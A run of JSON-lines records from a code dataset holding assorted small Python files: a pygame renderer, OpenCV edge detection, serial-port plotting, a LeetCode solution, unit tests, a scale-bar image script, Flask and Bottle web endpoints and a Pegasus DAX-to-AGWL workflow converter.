Take the cached action and update the state\n if cached_action:\n self.env.take_cached_action(\n agent_index, cached_action)\n self.env.update_state()\n\n # Indicate the rendering should continue\n return True\n\n def _init_prev_ball_state(self):\n agent_size = self.env.options.agent_size\n self.prev_ball_state = agent_size * [None]\n\n def _load_dirty_group(self):\n self.dirty_groups = pygame.sprite.RenderUpdates()\n\n def _update_overlay_pos(self):\n for agent_index in range(self.env.options.agent_size):\n [overlay_has_ball, overlay_no_ball] = self._get_overlays(\n agent_index)\n has_ball = self.env.state.get_agent_ball(agent_index)\n agent_pos = self.env.state.get_agent_pos(agent_index)\n if has_ball:\n overlay_has_ball.set_pos(agent_pos)\n else:\n overlay_no_ball.set_pos(agent_pos)\n\n def _update_overlay_visibility(self):\n for agent_index in range(self.env.options.agent_size):\n # Get the static overlays\n [overlay_has_ball, overlay_no_ball] = self._get_overlays(\n agent_index)\n # Check whether the agent has the ball\n has_ball = self.env.state.get_agent_ball(agent_index)\n # Get the previous ball state\n prev_has_ball = self.prev_ball_state[agent_index]\n # Check whether the ball state has changed\n if prev_has_ball is None or prev_has_ball != has_ball:\n # Remove the old sprite and add the new sprite in the dirty\n # group\n if has_ball:\n self.dirty_groups.remove(overlay_no_ball)\n self.dirty_groups.add(overlay_has_ball)\n else:\n self.dirty_groups.remove(overlay_has_ball)\n self.dirty_groups.add(overlay_no_ball)\n # Set the previous ball state\n 
self.prev_ball_state[agent_index] = has_ball\n\n def _get_overlays(self, agent_index):\n name_has_ball = 'AGENT{}_BALL'.format(agent_index + 1)\n name_no_ball = 'AGENT{}'.format(agent_index + 1)\n overlay_has_ball = self.static_overlays[name_has_ball]\n overlay_no_ball = self.static_overlays[name_no_ball]\n return [overlay_has_ball, overlay_no_ball]\n","sub_path":"pygame_rl/scenario/soccer/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":6819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"546535458","text":"import cv2\nimport numpy as np\n\ndef identifica_bordas(img_bovino):\n # Converte a imagem para tons de cinza\n cinza = cv2.cvtColor(img_bovino, cv2.COLOR_BGR2GRAY)\n\n # Suavização\n blur = cv2.GaussianBlur(cinza,(41,41),0)\n\n # Passa Alta\n filtered = cinza - blur\n filtered = filtered + 127 * np.ones(cinza.shape, np.uint8)\n\n res = filtered.copy()\n\n for i in range(0, res.shape[0]):\n for j in range(0, res.shape[1]):\n (r) = res[i, j]\n if (r < 105):\n res[i, j] = (0)\n else:\n res[i, j] = (255)\n\n return filtered, res","sub_path":"proj_mosca/mosca/m_identifica_bordas.py","file_name":"m_identifica_bordas.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"309073356","text":"import zipfile\nimport os\nimport httplib\n\ndef archive_function(zip_dir, func_name):\n \"\"\"Archives a given function, and returns the \"\"\"\n\n archive_loc = os.path.join('./', zip_dir, func_name + '.zip')\n function_zip = zipfile.ZipFile(archive_loc, 'w', zipfile.ZIP_DEFLATED)\n for root, dirs, files in os.walk('venv/lib/python2.7/site-packages'):\n for file in files:\n file_path = os.path.join(root, file)\n function_zip.write(file_path)\n function_zip.write(os.path.join('lambda_handlers', func_name + '.py'), func_name + '.py')\n function_zip.close()\n\n return archive_loc\n\ndef get_ip():\n ip_conn = httplib.HTTPConnection('checkip.amazonaws.com')\n try:\n ip_conn.request(\"GET\", \"/\")\n res = ip_conn.getresponse()\n if res.status == 200:\n res = res.read()\n return res[:-1]\n else:\n return None\n finally:\n ip_conn.close()\n","sub_path":"deployment/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"73001025","text":"import extract\nimport numpy as np\nimport serial\nimport threading\n\nimport matplotlib.pyplot as plt\nimport matplotlib._color_data as mcd\nfrom drawnow import *\nimport timeit\nimport time\n\ncolor_map = list({name for name in mcd.CSS4_COLORS if \"xkcd:\" + name in mcd.XKCD_COLORS})\nexitThread = False\n\nlow = -10000\nhigh = 10000\n\n\nclass Receiver:\n def __init__(self, *args, wide=31, show=15):\n self.port_num = \"\"\n self.baud_rate = 9600\n self.line = []\n self.cnt = 0\n self.pre = 0\n self.now = 0\n self.elapsed_time = []\n self.signal = None\n self.num_receive = 0\n self.num_sensors = 0\n self.dataArr = []\n self.Arr = None\n self.sensor_dict = dict(zip(args, np.zeros(len(args))))\n self.sensor_data = []\n self.wide = wide\n self.show = show\n self.low = -10000\n self.high = 10000\n self.start_time = timeit.default_timer()\n\n def set_port_num(self, port_num):\n self.port_num = port_num\n\n def set_baud_rate(self, baud_rate):\n self.baud_rate = baud_rate\n\n def set_using_sensor(self, *args):\n for sensor in [arg for arg in args if arg in self.sensor_dict.keys()]:\n 
self.sensor_dict[sensor] = 1\n\n def get_used_sensor(self):\n return [key for (key, val) in self.sensor_dict.items() if val == 1]\n \n def receive(self, ser, ignore_line=2):\n global exitThread\n\n self.start_time = timeit.default_timer()\n while not exitThread:\n for val in ser.read():\n # print(self.line)\n self.line.append(chr(val))\n if val == 10:\n self.Arr = self.parsing_data(self.line)\n print(self.Arr)\n self.sensor_data.append(self.Arr)\n if len(self.sensor_data) > self.wide:\n self.sensor_data.pop()\n self.elapsed_time.pop()\n self.receive_time = timeit.default_timer()\n self.elapsed_time.append(self.receive_time - self.start_time)\n self.line = []\n\n self.num_receive+=1\n\n if self.num_receive > self.wide:\n if self.num_receive%self.show == 0:\n drawnow(self.make_fig)\n plt.pause(.000001)\n\n def make_fig(self):\n global color_map\n plt.title(\"title\")\n cmap_list = color_map[:len(self.sensor_data)]\n plt.plot(self.sensor_data, color=cmap_list)\n plt.ylim(self.low, self.high) # Set y min and max values\n plt.grid(True)\n # graph_legend = \n legend = self.get_used_sensor()\n plt.legend(legend)\n\n # fig, ax = plt.subplots(figsize=(20,12))\n # fig = plt.plot(self.Arr, color=cmap_list)\n # ax.set_xticklabels(labels = elapsed_time)\n # ax.legend(graph_legend)\n \n # def receive(self, ser, ignore_line=1):\n # while TRUE:\n # if self.num_receive <= ignore_line:\n # self.signal = ser.readlines()\n # self.num_receive += 1\n # time.sleep(0.1)\n # # del self.signal\n # else:\n # # self.signal = ser.readline()\n # # print(self.signal)\n # # time.sleep(0.001)\n # receive_time = timeit.default_timer()\n # self.elapsed_time.append(self.start_time - receive_time)\n # # print(ser.readline())\n # for val in ser.read():\n # self.line.append(chr(val))\n # if val == 10:\n # self.Arr = self.parsing_data(self.line)\n # print(self.Arr)\n # self.sensor_data.append(self.Arr)\n\n # if len(self.sensor_data) > self.wide:\n # self.sensor_data.pop()\n # self.elapsed_time.pop()\n # self.num_receive += 1\n # if self.num_receive % 100 == 0:\n # print(self.num_receive)\n\n # if receiver.num_receive > 200:\n # drawnow(make_fig(array=receiver.sensor_data, legend=receiver.get_used_sensor()))\n # stop_receive = get_stop_situation()\n\n def parsing_data(self, data, strip='[]', split=','):\n self.line = \"\".join(data)\n self.dataArr = self.line.strip().strip(strip).split(split)\n self.dataArr = np.array([int(val) for val in self.dataArr])\n return self.dataArr[[idx for idx, (k, v) in enumerate(self.sensor_dict.items()) if v == 1]]\n\n\ndef set_graph_options(low_, high_):\n global low\n global high\n\n low = low_\n high = high_\n\n\n\n\n\n\ndef get_stop_situation():\n return extract.stop_listener\n\n\ndef get_data_folder():\n return extract.data_folder_path\n\n\ndef get_pattern():\n return extract.pattern\n\n\nif __name__ == \"__main__\":\n print(\"Start\")\n print(get_data_folder())\n #Receiver = Receiver(\"a\", \"b\", \"c\", \"d\")\n #Receiver.set_using_sensor(\"a\", \"c\")\n # extract.set_data([1, 2, 3])\n # extract.set_extract_options(pattern_name=\"foward\")\n # print(path, pattern, beep1, beep2, elapsed, start_index)\n\n\"\"\"\n stop_receive = get_stop_situation()\n while not stop_receive:\n Receiver.receive()\n with extract.Listener(on_press=extract.on_press) as listener:\n while not extract.stop_listener:\n listener.join()\n stop_receive = get_stop_situation()\n\n print(\"Program 
Done...\")\n\"\"\"\n\n\n","sub_path":"2019E2Festa/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"205082215","text":"# 637. Average of Levels in Binary Tree\n\n# Given a non-empty binary tree, return the average value of the nodes on each level in the form of an array.\n# Example 1:\n# Input:\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# Output: [3, 14.5, 11]\n# Explanation:\n# The average value of nodes on level 0 is 3, on level 1 is 14.5, and on level 2 is 11. Hence return [3, 14.5, 11].\n# Note:\n# The range of node's value is in the range of 32-bit signed integer.\n\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass AverageOfLevels:\n def doit(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[float]\n \"\"\"\n buff = [root]\n res = []\n while buff:\n total = 0\n N = len(buff)\n newBuff = []\n for c in buff:\n total += c.val\n if c.left:\n newBuff.append(c.left)\n if c.right:\n newBuff.append(c.right)\n\n res.append(total / N)\n buff = newBuff\n\n return res\n\n\n def doit(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[float]\n \"\"\"\n if not root:\n return []\n my_list = []\n stack = []\n stack.append(root)\n while stack:\n temp_list = []\n temp_stack = []\n\n for i in stack:\n\n temp_list.append(i.val)\n\n if i.left:\n temp_stack.append(i.left)\n if i.right:\n temp_stack.append(i.right)\n\n if temp_list:\n my_list.append(sum(temp_list)/len(temp_list))\n\n stack = temp_stack\n\n return my_list\n\n\n\nif __name__ == \"__main__\":\n\n root = TreeNode(3)\n\n root.left = TreeNode(9)\n root.right = TreeNode(20)\n\n root.right.left = TreeNode(15)\n root.right.right = TreeNode(7)\n\n res = AverageOfLevels().doit(root)\n","sub_path":"PythonLeetcode/LeetCodeE/637_AverageOfLevelsInBinaryTree.py","file_name":"637_AverageOfLevelsInBinaryTree.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"173365931","text":"import random\nimport unittest\nfrom mock import Mock, patch\nfrom genetics import Genome, Population, fitness_function\n\n\ndef fake_randint(a, b):\n return 0\n\n\nclass TestGenome(unittest.TestCase):\n def setUp(self):\n self.genomeA = Genome([1, 2, 3, 4, 5, 6, 7, 8])\n self.genomeB = Genome([8, 7, 6, 5, 4, 3, 2, 1])\n\n def test_mate(self):\n child = self.genomeA.mate(self.genomeB)\n expected_child = Genome([1, 2, 3, 4, 4, 3, 2, 1])\n self.assertEqual(child, expected_child)\n\n @patch('random.randint', fake_randint)\n def test_mutate(self):\n expected_mutant = Genome([2, 2, 3, 4, 5, 6, 7, 8])\n self.genomeA.mutate()\n self.assertEqual(self.genomeA, expected_mutant, str(self.genomeA))\n\n\nclass TestPopulation(unittest.TestCase):\n def test_init_with_no_parameters(self):\n random_population = Population()\n self.assertEqual(random_population.size(), 50)\n\n def test_get_fittest_pair(self):\n population = Population(\n members=[Genome([1, 2, 3, 4, 5, 6, 7, 8]),\n Genome([8, 7, 6, 5, 4, 3, 2, 1]),\n Genome([4, 3, 2, 1, 8, 7, 6, 5])])\n fittest_pair = population.get_fittest_pair(self._fitness_function)\n expected_fittest_pair = (\n Genome([8, 7, 6, 5, 4, 3, 2, 1]),\n Genome([4, 3, 2, 1, 8, 7, 6, 5]))\n self.assertEqual(fittest_pair, expected_fittest_pair)\n\n def _fitness_function(self, genome):\n return genome.solution[0]\n\n\nclass 
TestFitnessFunction(unittest.TestCase):\n def test_all_same(self):\n genome = Genome([1, 1, 1, 1, 1, 1, 1, 1])\n expected_fitness = -28\n fitness = fitness_function(genome)\n self.assertEqual(fitness, expected_fitness)\n\n def test_one_pair(self):\n genome = Genome([1, 1, 3, 5, 7, 2, 4, 6])\n expected_fitness = -1\n fitness = fitness_function(genome)\n self.assertEqual(fitness, expected_fitness)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"148989421","text":"# %load q03_t_test/build.py\n# Default imports\nimport scipy.stats as stats\nimport pandas as pd,numpy as np\n\ndf = pd.read_csv('data/house_pricing.csv')\n\n\n# Enter Code Here\ndef t_statistic(df):\n t_stat, p_value =stats.ttest_1samp(a= df[df['Neighborhood'] == 'OldTown']['GrLivArea'], # Sample data\n popmean= df['GrLivArea'].mean())\n \n p_crit = stats.norm.ppf(q=0.90)\n if(p_value 1):\n\tprint(\"\\033[91m{}\\033[00m\" .format(\"Error! Multiple matches from filtering criteria.\"), file=sys.stderr)\n\tsys.exit(2)\n\n# Input image\nimg = Image.open(input_image).convert(\"RGB\")\nexif = img.info['exif']\nicc_profile = img.info.get('icc_profile')\n\n# Read width and height from image\nwidth, height = img.size\n\n# Scale of one pixel\nscale_pixel = (height / entry.ImageHeight) * (entry.PixelDistance / entry.Scale)\n\n# Width of scale bar\nif (scale_multiplier == 0):\n\tscale_width = round(scale_pixel * entry.Scale * (entry.ImageHeight / height), 0)\nelif (scale_multiplier == 1):\n\tscale_width = round(scale_pixel * entry.Scale, 0)\nelse:\n\tscale_width = round(scale_pixel * entry.Scale * scale_multiplier, 0)\n\n# Height of scale bar\nscale_height = round((height) / (entry.ImageHeight / 100), 0)\n\n# Label beside the scale base\nscale_label = (' ' + entry.Scale.to_string(index=False) + ' ' + entry.Unit.to_string(index=False) + ' ')\n\n# Define font\nif (scale_type == 1):\n\tscale_font_size = int(round(scale_height * 1.8, 0))\n\tscale_font = ImageFont.truetype(\"Arial Bold\", scale_font_size)\n\tscale_label_width, scale_label_height = scale_font.getsize(scale_label)\nelse:\n\tscale_height = round(scale_height / 6, 0)\n\tscale_font_size = int(round(height / 25, 0))\n\tscale_font = ImageFont.truetype(\"Arial Bold\", scale_font_size)\n\tscale_label_width, scale_label_height = scale_font.getsize(scale_label)\n\n# Coordinates of scale bar\nif (scale_type == 1):\n\tscale_bar_x1 = (width - scale_width - scale_label_width)\n\tscale_bar_y1 = height - scale_height - scale_font.getsize(' ')[0]\n\tscale_bar_x2 = scale_bar_x1 + scale_width\n\tscale_bar_y2 = scale_bar_y1 + scale_height\n\tscale_bar_y3 = scale_bar_y1 - ((scale_label_height - (scale_bar_y2 - scale_bar_y1)) / 2)\nelse:\n\tscale_bar_x1 = (width - scale_width) - round(width / 33, 0)\n\tscale_bar_y1 = height - scale_height - round(height / 33, 0) - scale_font.getsize(' ')[0]\n\tscale_bar_x2 = scale_bar_x1 + scale_width\n\tscale_bar_y2 = scale_bar_y1 + scale_height\n\tscale_bar_x4 = scale_bar_x1 + (scale_width / 2) - (scale_label_width / 2.5)\n\tscale_bar_y4 = scale_bar_y2 + scale_height\n\n# Type 1: Draw box and label beside it\nif (scale_type == 1):\n\tdraw = ImageDraw.Draw(img)\n\tdraw.rectangle( ((scale_bar_x1, scale_bar_y1), (scale_bar_x2, scale_bar_y2)), fill=\"black\")\n\tdraw.text((scale_bar_x2, scale_bar_y3), scale_label, font=scale_font, fill=\"black\")\nelse:\n\tadj = round(height / 
600, 1)\n\tdraw = ImageDraw.Draw(img)\n\tdraw.rectangle( ((scale_bar_x1, scale_bar_y1), (scale_bar_x2, scale_bar_y2)), fill=\"black\")\n\tdraw.rectangle( ((scale_bar_x1, scale_bar_y1-(adj*3)), (scale_bar_x1+(adj*2), scale_bar_y2+(adj*3))), fill=\"black\")\n\tdraw.rectangle( ((scale_bar_x2-(adj*2), scale_bar_y1-(adj*3)), (scale_bar_x2, scale_bar_y2+(adj*3))), fill=\"black\")\n\tdraw.text((scale_bar_x4-adj, scale_bar_y4), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4+adj, scale_bar_y4), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4, scale_bar_y4-adj), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4, scale_bar_y4+adj), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4-adj, scale_bar_y4+adj), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4+adj, scale_bar_y4-adj), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4-adj, scale_bar_y4-adj), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4+adj, scale_bar_y4+adj), scale_label, font=scale_font, fill=\"black\")\n\tdraw.text((scale_bar_x4, scale_bar_y4), scale_label, font=scale_font, fill=\"white\")\n\n# Save output image\nimg.save(output_image, format='JPEG', quality=jpeg_quality, optimize=True, progressive=True, exif=exif, icc_profile=icc_profile)\n\nprint(\"Done.\")\n","sub_path":"scale_bar.py","file_name":"scale_bar.py","file_ext":"py","file_size_in_byte":7538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"144330402","text":"#!/usr/bin/env python\n\nimport flask_or_bottle, os, sys, webbrowser\n\napp = flask_or_bottle.app\n\n@app.route('/')\ndef hello():\n return '
Hello World!
' + flask_or_bottle.footer\n\nif __name__ == '__main__':\n if sys.platform == 'darwin':\n webbrowser.open('http://127.0.0.1:5000')\n app.run(debug=True, port=5000) # if on Mac OSX\n else:\n port = os.getenv('VCAP_APP_PORT', '5000')\n app.run(host='0.0.0.0', port=int(port))\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"380089061","text":"#MIT License\n#\n#Copyright (c) 2017 Juan J. Durillo\n#\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n#\n#The above copyright notice and this permission notice shall be included in all\n#copies or substantial portions of the Software.\n#\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#SOFTWARE.\n\nimport sys\nimport os\nimport xml.etree.ElementTree as ET\nimport collections\nfrom xml.dom import minidom\nimport ntpath\n\n\ndef buildFilesDictionary(files):\n files_dictionary = {}\n # a file has a single element pfn with the url of the file\n for file in files:\n files_dictionary[file.attrib['name']] = file[0].attrib['url']\n\n return files_dictionary\n####buildFilesDictionary\n\ndef buildExecutablesDictionary(executables):\n executables_dictionary = {}\n # a executable has a single element pfn with the url of the file\n for executable in executables:\n executables_dictionary[executable.attrib['name']] = executable[0].attrib['url']\n\n return executables_dictionary\n####buildExecutablesDictionary\n\n\ndef buildJobsDictionary(jobs,dependencies):\n jobs_dictionary = collections.OrderedDict()\n for job in jobs:\n jobs_dictionary[job.attrib['id']] = {}\n # obtaining executable\n jobs_dictionary[job.attrib['id']]['executable'] = job.attrib['name']\n # obtaining arguments\n jobs_dictionary[job.attrib['id']]['arguments'] = []\n argument = job.find('{http://pegasus.isi.edu/schema/DAX}argument')\n #print(job.attrib['id'])\n if argument is not None:\n sub_files = argument.findall('{http://pegasus.isi.edu/schema/DAX}file')\n if len(sub_files) == 0:\n # this is a hardcoded argument\n jobs_dictionary[job.attrib['id']]['arguments'].append(argument.text)\n else:\n i = 0\n for text in argument.itertext():\n #print(text)\n if i < len(sub_files):\n jobs_dictionary[job.attrib['id']]['arguments'].append(([text,sub_files[i].attrib['name']]))\n i = i + 1\n else:\n jobs_dictionary[job.attrib['id']]['arguments'].append((text))\n #print(jobs_dictionary[job.attrib['id']]['arguments'])\n\n\n\n\n # processing inputs and outputs\n jobs_dictionary[job.attrib['id']]['inputs'] = []\n jobs_dictionary[job.attrib['id']]['outputs'] = []\n\n\n uses = job.findall('{http://pegasus.isi.edu/schema/DAX}uses')\n for use in uses:\n if use.attrib['link'] 
== \"input\":\n jobs_dictionary[job.attrib['id']]['inputs'].append(use.attrib['name'])\n else:\n jobs_dictionary[job.attrib['id']]['outputs'].append(use.attrib['name'])\n\n jobs_dictionary[job.attrib['id']]['depends'] = []\n jobs_dictionary[job.attrib['id']]['unmetDependencies'] = []\n jobs_dictionary[job.attrib['id']]['parent'] = []\n jobs_dictionary[job.attrib['id']]['executed'] = False\n\n #adding dependencies\n for dependence in dependencies:\n parents = dependence.findall('{http://pegasus.isi.edu/schema/DAX}parent')\n for parent in parents:\n jobs_dictionary[dependence.attrib['ref']]['depends'].append(parent.attrib['ref'])\n jobs_dictionary[dependence.attrib['ref']]['unmetDependencies'].append(parent.attrib['ref'])\n jobs_dictionary[parent.attrib['ref']]['parent'].append(dependence.attrib['ref'])\n\n\n return jobs_dictionary\n####buildJobsDictionary\n\ndef createBaseXML():\n return ET.Element('cgwd',attrib={'author':'parser', 'domain' : '', 'name' : 'parser-workflow', 'version':''})\n####createBaseXML\n\ndef addWorkflowInputs(agwl_format,files_dictionary):\n workflow_inputs = ET.SubElement(agwl_format,'cgwdInput')\n for file in files_dictionary:\n dataIn =ET.SubElement(workflow_inputs,'dataIn')\n dataIn.attrib={'category':'Data', 'name':file, 'source':files_dictionary[file],'type':'agwl:file'}\n dataRepresentation = ET.SubElement(dataIn,'dataRepresentation')\n\n storageType = ET.SubElement(dataRepresentation,'storageType')\n storageType.text= 'FileSystem'\n contentType = ET.SubElement(dataRepresentation,'contentType')\n contentType.text='File'\n archiveType = ET.SubElement(dataRepresentation,'archiveType')\n archiveType.text='none'\n cardinality = ET.SubElement(dataRepresentation,'cardinality')\n cardinality.text='single'\n return agwl_format\n####addWorkflowInputs\n\ndef readyToExecuteJobs(jobs_dictionary):\n independent_jobs = []\n for job in jobs_dictionary:\n if len(jobs_dictionary[job]['unmetDependencies']) == 0 and jobs_dictionary[job]['executed'] == False:\n independent_jobs.append(job)\n return independent_jobs\n####readyToExecuteJobs\n\n\n\nif __name__ == \"__main__\":\n\n ## Checking correct number of arguments\n if len(sys.argv) < 2:\n print(\"Usage dax2agwl [file.dax]\")\n sys.exit()\n\n\n daxFile=sys.argv[1]\n # Checks the input file exists\n if not os.path.exists(daxFile):\n print(\"File \"+daxFile+\" not found\")\n sys.exit()\n\n # Obtaining the root of the xml representing the workflow in dax format\n root = ET.parse(daxFile).getroot()\n\n files_dictionary = buildFilesDictionary(root.findall('{http://pegasus.isi.edu/schema/DAX}file'))\n executables_dictionary = buildExecutablesDictionary(root.findall('{http://pegasus.isi.edu/schema/DAX}executable'))\n jobs_dictionary = buildJobsDictionary(root.findall('{http://pegasus.isi.edu/schema/DAX}job'),root.findall('{http://pegasus.isi.edu/schema/DAX}child'))\n\n # Create an empty agwl workflow\n agwl_format = createBaseXML()\n\n #add inputs to a given workflow, based on the files_dictionary\n agwl_format = addWorkflowInputs(agwl_format,files_dictionary)\n\n # getting the tasks to be executed\n body = ET.SubElement(agwl_format,'cgwdBody')\n\n\n\n independent_jobs = readyToExecuteJobs(jobs_dictionary)\n fork_counter = 1\n while len(independent_jobs) > 0 :\n\n parallel_mode = False\n if len(independent_jobs) > 1:\n parallel_mode = True\n\n\n parallelBody = None\n if parallel_mode:\n parallel = ET.SubElement(body,'parallel')\n parallel.attrib={'name':'ForkNode_'+str(fork_counter)}\n parallelBody = 
ET.SubElement(parallel,'parallelBody')\n fork_counter = fork_counter + 1\n\n while len(independent_jobs) > 0 :\n job = independent_jobs[0]\n independent_jobs.remove(job)\n\n element = body\n if parallel_mode:\n section = ET.SubElement(parallelBody,'section')\n element = section\n\n activity = ET.SubElement(element,'activity')\n activity.attrib = {'function':'Function','name':job,'type':'soy:'+job}\n\n # inputs are based on dependencies\n dataIns = ET.SubElement(activity,'dataIns')\n for input_file in jobs_dictionary[job]['inputs']:\n dataIn = ET.SubElement(dataIns,'dataIn')\n if input_file in files_dictionary:\n dataIn.attrib={'category':'Data','name':input_file,'source':'parser-workflow'+'/'+input_file,'type':'agwl:file'}\n else:\n for parent in jobs_dictionary[job]['depends'] :\n if input_file in jobs_dictionary[parent]['outputs']:\n dataIn.attrib={'category':'Data','name':input_file,'source':parent+'/' +input_file,'type':'agwl:file'}\n break\n\n dataRepresentation = ET.SubElement(dataIn,'dataRepresentation')\n storageType = ET.SubElement(dataRepresentation,'storageType')\n storageType.text= 'FileSystem'\n contentType = ET.SubElement(dataRepresentation,'contentType')\n contentType.text='File'\n archiveType = ET.SubElement(dataRepresentation,'archiveType')\n archiveType.text='none'\n cardinality = ET.SubElement(dataRepresentation,'cardinality')\n cardinality.text='single'\n\n #outputs of the task\n dataOuts = ET.SubElement(activity,'dataOuts')\n\n for output_file in jobs_dictionary[job]['outputs']:\n dataOut = ET.SubElement(dataOuts,'dataOut')\n dataOut.attrib = {'category':'', 'name':output_file,'saveto':'', 'type':'agwl:file'}\n dataRepresentation = ET.SubElement(dataOut,'dataRepresentation')\n storageType = ET.SubElement(dataRepresentation,'storageType')\n storageType.text= 'FileSystem'\n contentType = ET.SubElement(dataRepresentation,'contentType')\n contentType.text='File'\n archiveType = ET.SubElement(dataRepresentation,'archiveType')\n archiveType.text='none'\n cardinality = ET.SubElement(dataRepresentation,'cardinality')\n cardinality.text='single'\n\n jobs_dictionary[job]['executed'] = True\n\n for child in jobs_dictionary[job]['parent']:\n jobs_dictionary[child]['unmetDependencies'].remove(job)\n\n\n\n independent_jobs = readyToExecuteJobs(jobs_dictionary)\n\n last_activity = jobs_dictionary.keys()[-1]\n workflow_output = ET.SubElement(agwl_format,'cgwdOutput')\n for output_file in jobs_dictionary[last_activity]['outputs']:\n dataOut = ET.SubElement(workflow_output,'dataOut')\n dataOut.attrib = {'category':'', 'name':output_file,'saveto':'', 'source':last_activity+'/'+output_file,'type':'agwl:file'}\n dataRepresentation = ET.SubElement(dataOut,'dataRepresentation')\n storageType = ET.SubElement(dataRepresentation,'storageType')\n storageType.text= 'FileSystem'\n contentType = ET.SubElement(dataRepresentation,'contentType')\n contentType.text='File'\n archiveType = ET.SubElement(dataRepresentation,'archiveType')\n archiveType.text='none'\n cardinality = ET.SubElement(dataRepresentation,'cardinality')\n cardinality.text='single'\n\n\n\n rough_string = ET.tostring(agwl_format, 'utf-8')\n reparsed = minidom.parseString(rough_string)\n print(reparsed.toprettyxml(indent=\" \"))\n\n\n","sub_path":"dax2agwl.py","file_name":"dax2agwl.py","file_ext":"py","file_size_in_byte":11158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"100853873","text":"import io\nfrom flask import Flask, request, jsonify\nfrom flask_cors import 
cross_origin\nfrom hrmcompiler.jsonassembler import Assembler\nfrom hrmcompiler import calculate_optimized_ast\nfrom collections import namedtuple\n\napp = Flask(__name__)\n\nCompilerArgs = namedtuple(\"CompilerArgs\", [\n \"no_jump_compression\",\n \"no_unreachable\",\n \"no_jmp_then_label\",\n])\n\n\n@app.route(\"/build\", methods=[\"POST\"])\n@cross_origin()\ndef build():\n # data = request.get_data().decode(\"utf-8\")\n data = request.get_json(force=True)\n # print(\"/build\", data)\n args = CompilerArgs(False, False, False)\n ast = calculate_optimized_ast(io.StringIO(data[\"code\"]), args)\n a = Assembler()\n a.convert(ast)\n # print(\"converted: \", a.code)\n return jsonify({\"code\": a.code})\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"561239104","text":"#!/usr/bin/env python\n#_*_coding:utf-8_*_\n\nimport os\nfrom dao import models\nfrom dao import ormdjango as orm\n\ndef fabu(request,u):\n ret = {\"status\":True,\"message\":\"\"}\n title = request.POST.get(\"title\", None)\n summary = request.POST.get(\"summary\", None)\n content = request.POST.get(\"content\", None)\n file = request.FILES.get(\"file\", None)\n print(all([title, summary, content, file]))\n if all([title, summary, content, file]):\n\n PATH = os.path.join(\"web/statics/img/upload/\", file.name)\n f = open(PATH, \"wb\")\n for chunk in file.chunks():\n f.write(chunk)\n print(title, summary, content, file,u)\n file = \"/statics/img/upload/%s\" % file.name\n x = orm.publish(title,summary,content,file,u)\n print(x)\n if not x[\"status\"]:\n ret['status'] = False\n ret['message'] = \"发布文章到数据库时候服务器出错,联系管理员%s\" % x['message']\n else:\n ret['status'] =False\n ret['message'] = \"有内容为空请返回重新提交\"\n\n return ret","sub_path":"service/manage/pubartichle.py","file_name":"pubartichle.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"549292987","text":"from datetime import datetime\nimport json\n\nfrom bottle import get, post, put, delete, request\n\nfrom shapely.geometry import Point\nfrom geoalchemy import WKTSpatialElement\n\nimport phi.core.model as model\nimport phi.core.repository as repo\n\nfrom phi.rest import rest_method, db_session\nimport phi.rest.vo as vo\n\n\n@get('workspace/getbyowner')\n@rest_method\ndef get_by_owner():\n\tuser_name = request.GET.get('userName')\n\tstart = int(request.GET.get('start'))\n\tlimit = 